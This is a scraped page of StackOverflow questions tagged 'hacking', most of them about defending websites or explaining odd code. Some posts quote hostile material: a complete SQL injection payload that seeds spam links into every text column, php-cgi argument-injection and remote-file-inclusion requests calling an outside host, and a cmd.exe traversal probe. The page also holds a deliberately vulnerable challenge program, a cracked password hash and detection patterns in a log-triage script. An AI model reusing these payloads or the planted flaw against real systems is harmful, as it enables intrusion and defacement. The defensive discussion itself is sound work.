EzDevInfo.com

hacking interview questions

Top hacking frequently asked interview questions

Kali linux - "bash:aircrack:command not found" and how to make it work

I am using Kali 2.0 on my USB Live dongle and I can see aircrack is installed in the program menu. But when I type something like aircrack -ng or airmon -ng start wlan0 it returns bash: command not found. Does somebody know what's wrong with that? Thanks a lot.


Source: (StackOverflow)

Why using char* arr[1] in C?

I came across the following code. Why is *child[1] used instead of *child?

struct _zend_ast {
    zend_ast_kind kind; /* Type of the node (ZEND_AST_* enum constant) */
    zend_ast_attr attr; /* Additional attribute, use depending on node type */
    uint32_t lineno;    /* Line number */
    zend_ast *child[1]; /* Array of children (using struct hack) */
};

Source: (StackOverflow)


Any way to workaround WPF's calling of GC.Collect(2) aside from reflection?

I recently had to check in this monstrosity into production code to manipulate private fields in a WPF class: (tl;dr how do I avoid having to do this?)

private static class MemoryPressurePatcher
{
    private static Timer gcResetTimer;
    private static Stopwatch collectionTimer;
    private static Stopwatch allocationTimer;
    private static object lockObject;

    public static void Patch()
    {
        Type memoryPressureType = typeof(Duration).Assembly.GetType("MS.Internal.MemoryPressure");
        if (memoryPressureType != null)
        {
            collectionTimer = memoryPressureType.GetField("_collectionTimer", BindingFlags.Static | BindingFlags.NonPublic)?.GetValue(null) as Stopwatch;
            allocationTimer = memoryPressureType.GetField("_allocationTimer", BindingFlags.Static | BindingFlags.NonPublic)?.GetValue(null) as Stopwatch;
            lockObject = memoryPressureType.GetField("lockObj", BindingFlags.Static | BindingFlags.NonPublic)?.GetValue(null);

            if (collectionTimer != null && allocationTimer != null && lockObject != null)
            {
                gcResetTimer = new Timer(ResetTimer);
                gcResetTimer.Change(TimeSpan.Zero, TimeSpan.FromMilliseconds(500));
            }
        }                
    }       

    private static void ResetTimer(object o)
    {
        lock (lockObject)
        {
            collectionTimer.Reset();
            allocationTimer.Reset();
        }
    }
}

To understand why I would do something so crazy, you need to look at MS.Internal.MemoryPressure.ProcessAdd():

/// <summary>
/// Check the timers and decide if enough time has elapsed to
/// force a collection
/// </summary>
private static void ProcessAdd()
{
    bool shouldCollect = false;

    if (_totalMemory >= INITIAL_THRESHOLD)
    {
        // need to synchronize access to the timers, both for the integrity
        // of the elapsed time and to ensure they are reset and started
        // properly
        lock (lockObj)
        {
            // if it's been long enough since the last allocation
            // or too long since the last forced collection, collect
            if (_allocationTimer.ElapsedMilliseconds >= INTER_ALLOCATION_THRESHOLD
                || (_collectionTimer.ElapsedMilliseconds > MAX_TIME_BETWEEN_COLLECTIONS))
            {
                _collectionTimer.Reset();
                _collectionTimer.Start();

                shouldCollect = true;
            }
            _allocationTimer.Reset();
            _allocationTimer.Start();
        }

        // now that we're out of the lock do the collection
        if (shouldCollect)
        {
            Collect();
        }
    }

    return;
}

The important bit is near the end, where it calls the method Collect():

private static void Collect()
{
    // for now only force Gen 2 GCs to ensure we clean up memory
    // These will be forced infrequently and the memory we're tracking
    // is very long lived so it's ok
    GC.Collect(2);
}

Yes, that's WPF actually forcing a gen 2 garbage collection, which forces a full blocking GC. A naturally occurring GC happens without blocking on the gen 2 heap. What this means in practice is that whenever this method is called, our entire app locks up. The more memory your app is using, and the more fragmented your gen 2 heap is, the longer it will take. Our app presently caches quite a bit of data and can easily take up a gig of memory and the forced GC can lock up our app on a slow device for several seconds -- every 850 ms.

For despite the author's protestations to the contrary, it is easy to arrive at a scenario where this method is called with great frequency. This memory code of WPF's occurs when loading a BitmapSource from a file. We virtualize a listview with thousands of items where each item is represented by a thumbnail stored on disk. As we scroll down, we are dynamically loading in those thumbnails, and that GC is happening at maximum frequency. So scrolling becomes unbelievably slow and choppy with the app locking up constantly.

With that horrific reflection hack I mentioned up top, we force the timers to never be met, and thus WPF never forces the GC. Furthermore, there appear to be no adverse consequences -- memory grows as one scrolls and eventually a GC is triggered naturally without locking up the main thread.

Is there any other option to prevent those calls to GC.Collect(2) that is not so flagrantly hideous as my solution? Would love to get an explanation for what the concrete problems are that might arise from following through with this hack. By that I mean problems with avoiding the call to GC.Collect(2). (seems to me the GC occurring naturally ought to be sufficient)


Source: (StackOverflow)

Someone is trying to hack my website

I am catching the following exception in my logs:

mt: 15867';declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in 
('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into @w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case 
ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style=&quot;display:none&quot;''+char(62)+''inderal 10mg ''+char(60)+''a rel='nofollow' href=&quot;http:''+char(47)+char(47)+''blog.coepd.com''+char(47)+''page''+char(47)+''Keflex-Pill&quot;''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''blog.coepd.com'''' when 1 then ''''blog.coepd.com'''' else 
''''blog.coepd.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' viagra 25mg''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in 
(2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--&lt;br/&gt;    sess: 2&lt

The hacking begins at the moment of ;declare and finishes at the --. All of my SQL queries should be parameterized, but if not, I need to eliminate this threat.

What are my best options here? I have a specific "web" login account for the database. What is best practice for minimizing this web login account's credentials or denying access to specific SQL objects?

What is this person trying to do? Here's another hack attempt:

;declare @b cursor;declare @s varchar(8000);declare @w varchar(99);set @b=cursor for select DB_NAME() union select name from sys.databases where (has_dbaccess(name)!=0) and name not in ('master','tempdb','model','msdb',DB_NAME());open @b;fetch next from @b into 
@w;while @@FETCH_STATUS=0 begin set @s='begin try use '+@w+';declare @c cursor;declare @d varchar(4000);set @c=cursor for select ''update [''+TABLE_NAME+''] set [''+COLUMN_NAME+'']=[''+COLUMN_NAME+'']+case ABS(CHECKSUM(NewId()))%10 when 0 then ''''''+char(60)+''div style=&quot;display:none&quot;''+char(62)+''tadalafil 40mg ''+char(60)+''a 
rel='nofollow' href=&quot;http:''+char(47)+char(47)+''www.guitar-frets.com''+char(47)+''blog''+char(47)+''page''+char(47)+''synthroid-200mcg.aspx&quot;''+char(62)+''''''+case ABS(CHECKSUM(NewId()))%3 when 0 then ''''levofloxacin 750mg'''' when 1 then ''''guitar-frets.com'''' else ''''guitar-frets.com'''' end +''''''+char(60)+char(47)+''a''+char(62)+'' valacyclovir 
pill''+char(60)+char(47)+''div''+char(62)+'''''' else '''''''' end'' FROM sysindexes AS i INNER JOIN sysobjects AS o ON i.id=o.id INNER JOIN INFORMATION_SCHEMA.COLUMNS ON o.NAME=TABLE_NAME WHERE(indid in (0,1)) and DATA_TYPE like ''%varchar'' and(CHARACTER_MAXIMUM_LENGTH in (2147483647,-1));open @c;fetch next from @c into @d;while @@FETCH_STATUS=0 begin 
exec (@d);fetch next from @c into @d;end;close @c end try begin catch end catch';exec (@s);fetch next from @b into @w;end;close @b--&lt;br

And here's a snapshot of my log. If you look from bottom to top you can see that this hacker is trying each parameter to inject his code.

[screenshot of the log; image not available]


Source: (StackOverflow)

CSS hack only for apple iphone

I want to change some CSS properties only on Apple iPhone devices. Is there any way to target the Apple iPhone alone?

For all devices

.menu{
    -webkit-transition:all 100ms ease;
    -moz-transition:all 100ms ease;
    -o-transition:all 100ms ease;
    transition:  all 100ms ease;
}

Only for Apple iPhone

.menu{
    transition: none;
}

Source: (StackOverflow)

What is FreeBSD MD5 and why does it produce hashes in non-hexadecimal notation?

I am doing a hacking challenge from Hack This Site in which I found a password hash and then cracked it by brute forcing possibilities. The format that my hash cracker (John the Ripper) used was something called "FreeBSD MD5". The password and hash are the following: PW: shadow HASH: $1$AAODv...$gXPqGkIO3Cu6dnclE/sok1

My question is, doesn't MD5 normally only have the charset 0123456789abcdef (hexadecimal)? Why is this hash suddenly including a bunch of other characters?

Screenshot: [image not available]


Source: (StackOverflow)
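What "FreeBSD MD5" actually is, as an added example (not from the question or from John the Ripper): the md5crypt construction from FreeBSD's crypt(3), which the `$1$` prefix denotes. The 22 characters after the last `$` are the 16-byte MD5 result re-encoded with crypt's own 64-character alphabet (`./0-9A-Za-z`), which is why letters beyond a-f and `/` appear; the salt and hash quoted in the question are used here only as a sample of the format.

```python
import hashlib
import hmac

# crypt(3)'s 64-character alphabet: this, not hexadecimal, is why the
# hash contains letters beyond a-f as well as '.' and '/'
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
MAGIC = b"$1$"  # the prefix that marks md5crypt ("FreeBSD MD5")


def to64(value, n):
    """Encode the low 6*n bits of value, least-significant 6 bits first."""
    out = []
    for _ in range(n):
        out.append(ITOA64[value & 0x3F])
        value >>= 6
    return "".join(out)


def md5crypt(password, salt):
    """Return '$1$<salt>$<22 chars>' following FreeBSD's md5crypt."""
    pw = password.encode()
    salt = salt.split("$")[0][:8]  # at most 8 salt characters, stop at '$'
    s = salt.encode()
    ctx = hashlib.md5(pw + MAGIC + s)
    alt = hashlib.md5(pw + s + pw).digest()
    for i in range(len(pw), 0, -16):  # one alt byte per password byte
        ctx.update(alt[:min(16, i)])
    i = len(pw)
    while i:  # one byte per bit of len(pw): a historical quirk of the design
        ctx.update(b"\0" if i & 1 else pw[:1])
        i >>= 1
    final = ctx.digest()
    # 1000 rounds with a varying input order: the deliberate slow-down that
    # separates md5crypt from a plain MD5 of the password
    for i in range(1000):
        ctx1 = hashlib.md5()
        ctx1.update(pw if i & 1 else final)
        if i % 3:
            ctx1.update(s)
        if i % 7:
            ctx1.update(pw)
        ctx1.update(final if i & 1 else pw)
        final = ctx1.digest()
    # The 16 digest bytes are regrouped into five 3-byte groups plus one
    # leftover byte, each emitted with the crypt alphabet: 5*4 + 2 = 22 chars
    groups = [(0, 6, 12), (1, 7, 13), (2, 8, 14), (3, 9, 15), (4, 10, 5)]
    encoded = "".join(
        to64((final[a] << 16) | (final[b] << 8) | final[c], 4) for a, b, c in groups
    )
    encoded += to64(final[11], 2)
    return "$1$%s$%s" % (salt, encoded)


def parse_md5crypt(hash_string):
    """Split a '$1$salt$hash' string into (salt, hash); None if malformed."""
    parts = hash_string.split("$")
    if len(parts) != 4 or parts[0] != "" or parts[1] != "1":
        return None
    salt, digest = parts[2], parts[3]
    if len(salt) > 8 or len(digest) != 22:
        return None
    if any(c not in ITOA64 for c in salt + digest):
        return None
    return salt, digest


def verify(password, hash_string):
    """Constant-time check of a password against a stored md5crypt hash."""
    parsed = parse_md5crypt(hash_string)
    if parsed is None:
        return False
    return hmac.compare_digest(md5crypt(password, parsed[0]), hash_string)


# The hash quoted in the question: an 8-character salt "AAODv..." (dots are
# valid salt characters) followed by a 22-character digest drawn from ITOA64
QUESTION_HASH = "$1$AAODv...$gXPqGkIO3Cu6dnclE/sok1"
```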

hack attempts from IP 127.0.0.1 - is there an exploit to be aware of?

I have noticed numerous entries in Tomcat's local_access_log for various resources coming from IP address 127.0.0.1. These are clearly attempts to hack in. For example, here is a request to get access to the "manager" app:

127.0.0.1 - - [30/Apr/2015:13:35:13 +0000] "GET /manager/html HTTP/1.1" 401 2474

here is another one:

127.0.0.1 - - [30/Apr/2015:21:23:37 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%64+%63%67%69%2E%66%6F%72%63%65%5F%72%65%64%69%72%65%63%74%3D%30+%2D%64+%63%67%69%2E%72%65%64%69%72%65%63%74%5F%73%74%61%74%75%73%5F%65%6E%76%3D%22%79%65%73%22+%2D%64+%63%67%69%2E%66%69%78%5F%70%61%74%68%69%6E%66%6F%3D%31+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E HTTP/1.1" 404 1016

When decoded, the URL is this:

127.0.0.1 - - [30/Apr/2015:21:23:37 +0000] "POST /cgi-bin/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -d cgi.force_redirect=0 -d cgi.redirect_status_env="yes" -d cgi.fix_pathinfo=1 -d auto_prepend_file=php://input -n HTTP/1.1" 404 1016

There are lots of such entries, all from IP address 127.0.0.1. Obviously, since this is the address of localhost, I can't block it. Moreover, I am not sure if there is something that I can do about it. Is there possibly an exploit that should be patched up? For instance, is there a version of Tomcat that has a related vulnerability? I am running Tomcat 8.

Much thanks for any advice!

UPDATE: thanks for the suggestion about a proxy. Turned out that httpd was indeed installed and, not surprisingly, there are suspicious requests. For example:

[Sat Mar 30 17:26:49 2013] [error] [client 5.34.247.59] Invalid URI in request GET /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir HTTP/1.0
[Sat Mar 30 17:26:49 2013] [error] [client 5.34.247.59] Invalid URI in request GET /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0
[Sat Mar 30 17:26:49 2013] [error] [client 5.34.247.59] Invalid URI in request GET /_mem_bin/../../../../winnt/system32/cmd.exe?/c+dir%20c:\\ HTTP/1.0 

This is not a Windows system, so cmd.exe has no place on it...


Source: (StackOverflow)

New in Socket.io, How to prevent Socket.io client script hacking

I'm new in Socket.IO, and I've just implemented the tutorial instruction about Socket.IO at http://socket.io/get-started/chat/. It's quite interesting.

But now I have a concern about security. The client code for sending message is:

<script>
  var socket = io();
  $('form').submit(function(){
    socket.emit('chat message', $('#m').val());
    $('#m').val('');
    return false;
  });
  socket.on('chat message', function(msg){
    $('#messages').append($('<li>').text(msg));
  });
</script>

The function call socket.emit sends a message to the server; by this flow, anyone who accesses the web page can easily modify the JavaScript code (using Chrome devtools or Firebug) to send any message to the server.

For example, a user can add code lines such as the following:

<script>
   $(document).load(function() {
       socket.emit('chat message', '1122');
       socket.emit('get_users', null);
       socket.emit('delete_user', 1);        // What ever he wants
   });
</script>

This hack may cause harm to the system.

My question is, how do I prevent users from modifying the JavaScript code and making manual calls to the socket.io server, including users who have the right to log in to the web application?

Any help would be greatly appreciated!


Source: (StackOverflow)

Hook ALL system calls in Linux

The goal is to add a hook to all system calls in Linux, that is, the hook function should get called before any of those 300 Linux system calls are invoked.

There are sys_call_table hacks (e.g. [here]), which however only allow hooking one or a few system calls; that is, if read() needs to be hijacked, the sys_read entry in sys_call_table is modified to point to the new function that has a hook handler.

Of course, you can manually hook all 300 syscall entries; but I am looking for a more elegant approach with few code modifications.

A possible approach is to change the file entry_64.S where ENTRY(system_call) resides. However, as I need to use a Linux kernel module and hack a live system, I find it difficult to modify the memory image of entry_64.S in a running Linux system.

So my question is:

  1. If the entry_64.S design makes sense, how do I modify a live memory area where kernel code resides (the kernel code segment)?
  2. If it does not make sense, how, in general, do I modify one (or a few) places in the Linux source code to allow all syscalls to be hooked?

PS: platform: Linux 3.16 and x86_64

PS2: Again my question is DIFFERENT from those sys_call_table hacks in prior stack overflow questions. See paragraph 2 for details.


Source: (StackOverflow)

Suspicious url - is someone trying to hack me?

In my Apache error log I found the following line:

[Fri Jul 17 22:15:48.632018 2015] [:error] [pid 2784:tid 1048] [client 97.74.24.134:57050] PHP Warning:  htmlspecialchars() expects parameter 1 to be string, array given in C:\\Apache24\\htdocs\\catalog\\private\\class\\ResolvedQuery.class.php on line 361

This line repeated itself a few times.

In my access log, I found the following requests:

97.74.24.134 - - [17/Jul/2015:22:15:48 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&amp;sa=U&amp;ved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&amp;usg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg////?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 301 448
97.74.24.134 - - [17/Jul/2015:22:15:48 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&amp%3bsa=U&amp%3bved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&amp%3busg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 200 16858
97.74.24.134 - - [17/Jul/2015:22:15:52 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&amp;sa=U&amp;ved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&amp;usg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg////?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 301 472
97.74.24.134 - - [17/Jul/2015:22:15:52 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen/p-1&amp%3bsa=U&amp%3bved=0CMMCEBYwQDisAmoVChMI0ZbipN7ixgIVlBCSCh38DQuH&amp%3busg=AFQjCNGRKRYHEh9kOtpkREvhHSYlLrZicg?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 200 16858
97.74.24.134 - - [17/Jul/2015:22:15:56 +0200] "GET ////?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 200 38779
97.74.24.134 - - [17/Jul/2015:22:15:59 +0200] "GET ////?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 302 189  
97.74.24.134 - - [17/Jul/2015:22:16:00 +0200] "GET / HTTP/1.1" 200 12875
97.74.24.134 - - [17/Jul/2015:22:16:03 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen////?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 301 320
97.74.24.134 - - [17/Jul/2015:22:16:04 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen?_SERVER[DOCUMENT_ROOT]=test?? HTTP/1.1" 302 189
97.74.24.134 - - [17/Jul/2015:22:16:04 +0200] "GET / HTTP/1.1" 200 12875
97.74.24.134 - - [17/Jul/2015:22:16:07 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen////?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 301 344
97.74.24.134 - - [17/Jul/2015:22:16:08 +0200] "GET /electro/alle-onderdelen/merk-members/alle-toepassingen?_SERVER[DOCUMENT_ROOT]=http://mironneto.com/id2.txt?? HTTP/1.1" 302 189
97.74.24.134 - - [17/Jul/2015:22:16:08 +0200] "GET / HTTP/1.1" 200 12875

I use a .htaccess file to direct all requests into an index.php file. From then on, I handle the request like this:

$query = str_replace('_url=/', '', $_SERVER['QUERY_STRING']);

From then on I do some operations on $query.

The part of the code that triggers the error however is the following:

//sanitize requests array.
if (!empty($_REQUEST)){
    foreach($_REQUEST as $req => $value){
        $p = htmlspecialchars($req);
        $v = htmlspecialchars($value); // THIS LINE TRIGGERS THE ERROR!
        $this->requests[$p] = $v;
    }
}

Now, what kind of attack is this? Does the code presented here protect me from this attack? And if not, what do I have to do to protect against this attack?

I'm using Apache 2.4 and PHP 5.6 on Win7.


Source: (StackOverflow)
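A small log-triage script, added here as an example and not part of this question or the Tomcat 127.0.0.1 question earlier on the page: it parses access-log lines of the shape both askers quoted, URL-decodes the request target and tags the patterns they saw (loopback source addresses, which mean a local reverse proxy forwarded the request and the real client is in that proxy's log; php-cgi `-d` argument injection; `_SERVER[...]` superglobal overwrite probes carrying a remote URL; cmd.exe path traversal). The sample lines are constructed from the quoted entries with a shortened php-cgi payload, documentation-range client addresses and a placeholder payload host.

```python
import ipaddress
import re
from urllib.parse import parse_qsl, unquote_plus

# "%h %l %u %t \"%r\" %s %b": the prefix both Apache httpd and Tomcat's AccessLogValve write
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/\d\.\d" (?P<status>\d{3}) (?P<size>\S+)'
)


def parse_line(line):
    """Split one access-log line into fields; None if it does not parse."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    path, _, query = rec["target"].partition("?")
    rec["path"] = unquote_plus(path)
    rec["query"] = unquote_plus(query)  # '+' -> space, %xx -> byte
    rec["params"] = parse_qsl(query, keep_blank_values=True)
    return rec


def classify(rec):
    """Return the list of finding tags for one parsed record."""
    tags = []
    path, query = rec["path"], rec["query"]
    try:
        # Nothing arrives from 127.0.0.1 over the network: a local reverse proxy
        # (httpd in front of Tomcat) forwarded it; the real client is in its log
        if ipaddress.ip_address(rec["ip"]).is_loopback:
            tags.append("loopback-source")
    except ValueError:
        pass
    if path.startswith("/manager/"):
        tags.append("tomcat-manager-probe")
    # php-cgi argument injection: decoded, the query is a list of "-d key=value"
    # php.ini overrides that php-cgi would take as command-line arguments
    if re.search(r"(^|\s)-d\s+[\w.]+=", query) or "auto_prepend_file=php://input" in query:
        tags.append("php-cgi-arg-injection")
    # Superglobal overwrite probe: _SERVER[...] as a parameter name tries to replace
    # a server variable; a remote URL value aims a later include() at attacker content
    for key, value in rec["params"]:
        if key.startswith("_SERVER["):
            tags.append("superglobal-override-probe")
            if re.match(r"https?://", value, re.I):
                tags.append("remote-url-in-param")
            break
    if "/../" in path or path.lower().endswith("cmd.exe"):  # traversal to a Windows shell
        tags.append("path-traversal")
    return tags


def triage(lines):
    """Map the index of each flagged line to (client ip, tags)."""
    findings = {}
    for n, line in enumerate(lines):
        rec = parse_line(line)
        tags = ["unparsed"] if rec is None else classify(rec)
        if tags:
            findings[n] = ("?" if rec is None else rec["ip"], tags)
    return findings


# Constructed sample lines adapted from the entries quoted in the two questions:
# the php-cgi query keeps two of its "-d" options, client addresses come from
# documentation ranges and the payload host is a placeholder
SAMPLE_LOG = [
    '127.0.0.1 - - [30/Apr/2015:13:35:13 +0000] "GET /manager/html HTTP/1.1" 401 2474',
    '127.0.0.1 - - [30/Apr/2015:21:23:37 +0000] "POST /cgi-bin/php?%2D%64+%61%6C%6C%6F%77'
    '%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64'
    '%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74 HTTP/1.1" 404 1016',
    '203.0.113.7 - - [17/Jul/2015:22:15:59 +0200] "GET ////?_SERVER[DOCUMENT_ROOT]='
    'http://attacker.example/id2.txt?? HTTP/1.1" 302 189',
    '203.0.113.7 - - [17/Jul/2015:22:16:00 +0200] "GET / HTTP/1.1" 200 12875',
    '198.51.100.9 - - [30/Mar/2013:17:26:49 +0000] "GET /_mem_bin/../../../../winnt/'
    'system32/cmd.exe?/c+dir HTTP/1.0" 400 226',
]

if __name__ == "__main__":
    for n, (ip, tags) in sorted(triage(SAMPLE_LOG).items()):
        print(f"line {n}: {ip}: {', '.join(tags)}")
```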

How to get a raw memory pointer to a managed class?

How do I find a raw pointer to a managed class in C#, and, hopefully, its raw size in memory? Obviously, this is not allowed by the CLR - more precisely, strictly prohibited, as the unmanaged representation of managed classes should never, ever be worked with, for both stability and safety reasons - so I'm looking for a hack. I'm not looking for serializing - I do actually need a dump of the managed class as it is represented in raw memory.

More precisely, I'm looking for something like function getObjectPtr in the following example:

IntPtr getObjectPtr(Object managedClass) {...}

void main() {
    var test = new TestClass();
    IntPtr ptr_to_test = getObjectPtr(test);   // an IntPtr value, not a pointer to one
    Console.WriteLine(ptr_to_test.ToString());
}

Thanks in advance!

EDIT: I've finally found a solution by myself, and, when came back to post it as an answer, was totally surprised by the amount of so-quickly already posted answers... Thanks to all of you! This was very quick and totally unexpected.

The closest to my solution was @thehennyy's, but I'm not posting it since @Chino proposed a far better one (sorry, I mistook it for wrong at first; I had just forgotten to dereference the pointer again). It does not require the code to be unsafe and tolerates GC a bit better:

class Program
{
    // Here is the function in case anyone needs it.
    // Note, though, it does not preserve the handle while you work with
    // pointer, so it is less reliable than the code in Main():
    static IntPtr getPointerToObject(Object unmanagedObject)
    {
        GCHandle gcHandle = GCHandle.Alloc(unmanagedObject, GCHandleType.WeakTrackResurrection);
        IntPtr thePointer = Marshal.ReadIntPtr(GCHandle.ToIntPtr(gcHandle));
        gcHandle.Free();
        return thePointer;
    }
    class TestClass
    {
        uint a = 0xDEADBEEF;
    }
    static void Main(string[] args)
    {
        byte[] cls = new byte[16];

        var test = new TestClass();

        GCHandle gcHandle = GCHandle.Alloc(test, GCHandleType.WeakTrackResurrection);
        IntPtr thePointer = Marshal.ReadIntPtr(GCHandle.ToIntPtr(gcHandle));
        Marshal.Copy(thePointer, cls, 0, 16); //Dump first 16 bytes...
        Console.WriteLine(BitConverter.ToString(BitConverter.GetBytes(thePointer.ToInt32())));
        Console.WriteLine(BitConverter.ToString(cls));

        Console.ReadLine();

        gcHandle.Free();
    }
}
/* Example output (yours should be different):
40-23-CA-02
4C-38-04-01-EF-BE-AD-DE-00-00-00-80-B4-21-50-73

That field's value is "EF-BE-AD-DE", 0xDEADBEEF as it is stored in memory. Yay, we found it!
*/

However, now I'm a bit clueless. According to this article, the first 2 addresses in the class should be pointers to the SyncBlock and RTTI structure, and therefore the first field's address must be offset by 2 words [8 bytes on 32-bit systems, 16 bytes on 64-bit systems] from the beginning. Mine is 64-bit; however, as you can see in the output, the first field's raw offset from the object's address is obviously only 4 bytes, which doesn't make any sense.

I've asked this as a separate question. Maybe I should ask this as a separate question, but it is possible that there is an error in my solution.


Source: (StackOverflow)

Using security questions and its safety

I know security questions are not safe and easily guessed, but what if, after answering the security question, we just send a securely prepared link to recover/reset the password to their email? Will that again be a problem?

And I also use PDO in my code, so no worries about SQL injection.


Source: (StackOverflow)
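What "securely prepared" should mean for the reset link, as an added example that is not from the question: a token drawn from the OS CSPRNG, stored only as a hash, bound to one user, short-lived and single-use, with earlier tokens for the same user invalidated when a new one is issued. The `ResetTokenStore` class and its injectable clock are assumptions made for illustration and testing.

```python
import hashlib
import hmac
import secrets
import time

TOKEN_TTL_SECONDS = 15 * 60  # the link is a bearer credential: keep its life short


class ResetTokenStore:
    """Issue and redeem single-use password-reset tokens.

    Only the SHA-256 of each token is stored, so a copy of the database
    cannot be turned into working reset links. The clock is injectable
    (an assumption made for testing, not part of the scheme)."""

    def __init__(self, now=time.time):
        self._now = now
        self._entries = {}  # sha256(token) -> {"user", "expires", "used"}

    @staticmethod
    def _digest(token):
        return hashlib.sha256(token.encode()).hexdigest()

    def issue(self, user_id):
        """Mint a fresh token for user_id; earlier tokens for that user stop working."""
        for entry in self._entries.values():
            if entry["user"] == user_id:
                entry["used"] = True
        token = secrets.token_urlsafe(32)  # 256 bits from the OS CSPRNG
        self._entries[self._digest(token)] = {
            "user": user_id,
            "expires": self._now() + TOKEN_TTL_SECONDS,
            "used": False,
        }
        return token

    def redeem(self, token):
        """Return the user_id for a valid token and burn it; None otherwise."""
        wanted = self._digest(token)
        for token_hash, entry in self._entries.items():
            # constant-time comparison so timing does not reveal partial matches
            if hmac.compare_digest(token_hash, wanted):
                if entry["used"] or self._now() > entry["expires"]:
                    return None
                entry["used"] = True
                return entry["user"]
        return None


def reset_link(base_url, token):
    """The URL to e-mail; it carries nothing but the opaque token."""
    return f"{base_url}/reset?token={token}"


if __name__ == "__main__":
    store = ResetTokenStore()
    t = store.issue("alice")
    print(reset_link("https://www.example.com", t))
    print(store.redeem(t), store.redeem(t))  # alice, then None
```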

Hacking Challenge - locating vulnerability in the code

My friend recently completed a hacking challenge and sent it to me (binary and source). I wanted to ask here before I asked him for tips, as I want to do it myself :)

I've been going through it but I am struggling to find the vulnerability.

#include <alloca.h>
#include <stdio.h>
#include <string.h>
#include <stdlib.h>

static void usage(const char *argv0) {
    printf("Build your own string!\n");
    printf("\n");
    printf("Usage:\n");
    printf("  %s length command...\n", argv0);
    printf("\n");
    printf("Each command consist of a single character followed by it's index.\n");
    printf("\n");
    printf("Example:\n");
    printf("  %s 11 h0 e1 l2 l3 o4 w6 o7 r8 l9 d10\n", argv0);
    exit(1);
}

int main(int argc, char **argv) {
    char *buffer;
    unsigned short buffersize, i, index, length;

    if (argc < 2) usage(argv[0]);

    length = atoi(argv[1]);
    if (length <= 0) {
            fprintf(stderr, "bad length\n");
            return 1;
    }

    buffersize = length + 1;
    buffer = alloca(buffersize);
    memset(buffer, ' ', buffersize);
    buffer[buffersize - 1] = 0;

    for (i = 2; i < argc; i++) {
            if (strlen(argv[i]) < 2) {
                    fprintf(stderr, "bad command \"%s\"\n", argv[i]);
                    return 1;
            }

            index = atoi(argv[i] + 1);
            if (index >= length) {
                    fprintf(stderr, "bad index in command \"%s\"\n", argv[i]);
                    return 1;
            }

            buffer[index] = argv[i][0];
    }

    printf("%s\n", buffer);
    return 0;
}

